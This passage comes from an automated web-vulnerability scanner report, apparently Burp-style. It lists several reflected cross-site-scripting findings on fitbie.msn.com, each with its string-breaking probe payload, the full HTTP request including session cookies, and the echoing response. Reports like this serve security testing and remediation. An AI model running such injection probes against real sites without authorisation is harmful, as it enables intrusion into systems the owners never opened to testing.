<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default47b04';ea0f9356189?destination=node%2Fdefault47b04';ea0f9356189&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.86. http://fitbie.msn.com/sites/default/files/dbell_cross_lunge_B-female-th_1.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/dbell_cross_lunge_B-female-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48bac'%3b139573ad8a6 was submitted in the REST URL parameter 2. This input was echoed as 48bac';139573ad8a6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default48bac'%3b139573ad8a6/files/dbell_cross_lunge_B-female-th_1.jpg?1293054510 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:01 +0000
ETag: "1297607401-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:30:01 GMT
Date: Sun, 13 Feb 2011 14:30:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default48bac';139573ad8a6?destination=node%2Fdefault48bac';139573ad8a6&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.87. http://fitbie.msn.com/sites/default/files/dumb-ly-tri-ext-B-female-th_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/dumb-ly-tri-ext-B-female-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fd51'%3b75c867689ec was submitted in the REST URL parameter 2. This input was echoed as 8fd51';75c867689ec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default8fd51'%3b75c867689ec/files/dumb-ly-tri-ext-B-female-th_0.jpg?1293052760 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:01 +0000
ETag: "1297607401-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:02 GMT
Date: Sun, 13 Feb 2011 14:30:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default8fd51';75c867689ec?destination=node%2Fdefault8fd51';75c867689ec&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.88. http://fitbie.msn.com/sites/default/files/ez_ly_tri_ext_A-male-th_1.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/ez_ly_tri_ext_A-male-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41641'%3bcab9174a1da was submitted in the REST URL parameter 2. This input was echoed as 41641';cab9174a1da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default41641'%3bcab9174a1da/files/ez_ly_tri_ext_A-male-th_1.jpg?1287431969 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:31 GMT
Date: Sun, 13 Feb 2011 14:26:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default41641';cab9174a1da?destination=node%2Fdefault41641';cab9174a1da&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.89. http://fitbie.msn.com/sites/default/files/flat_belly_diet_men_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/flat_belly_diet_men_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 178f5'%3bdbeb75eb455 was submitted in the REST URL parameter 2. This input was echoed as 178f5';dbeb75eb455 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default178f5'%3bdbeb75eb455/files/flat_belly_diet_men_th.jpg?1285852783 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:46 +0000
ETag: "1297607206-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:47 GMT
Date: Sun, 13 Feb 2011 14:26:47 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default178f5';dbeb75eb455?destination=node%2Fdefault178f5';dbeb75eb455&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.90. http://fitbie.msn.com/sites/default/files/flat_belly_diet_women_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/flat_belly_diet_women_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed2bc'%3be5e3251fd63 was submitted in the REST URL parameter 2. This input was echoed as ed2bc';e5e3251fd63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaulted2bc'%3be5e3251fd63/files/flat_belly_diet_women_th.jpg?1285868226 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:45 +0000
ETag: "1297607205-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:46 GMT
Date: Sun, 13 Feb 2011 14:26:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulted2bc';e5e3251fd63?destination=node%2Fdefaulted2bc';e5e3251fd63&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.91. http://fitbie.msn.com/sites/default/files/guilty-chocolate-snack-th_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/guilty-chocolate-snack-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3ee'%3b24104870631 was submitted in the REST URL parameter 2. This input was echoed as ea3ee';24104870631 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultea3ee'%3b24104870631/files/guilty-chocolate-snack-th_0.jpg?1297454792 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:10 +0000
ETag: "1297607170-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:11 GMT
Date: Sun, 13 Feb 2011 14:26:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultea3ee';24104870631?destination=node%2Fdefaultea3ee';24104870631&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.92. http://fitbie.msn.com/sites/default/files/home-workout-dumbbells-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/home-workout-dumbbells-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 226f4'%3bc8e94e44f55 was submitted in the REST URL parameter 2. This input was echoed as 226f4';c8e94e44f55 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default226f4'%3bc8e94e44f55/files/home-workout-dumbbells-th.jpg?1294621763 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:58 +0000
ETag: "1297607398-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
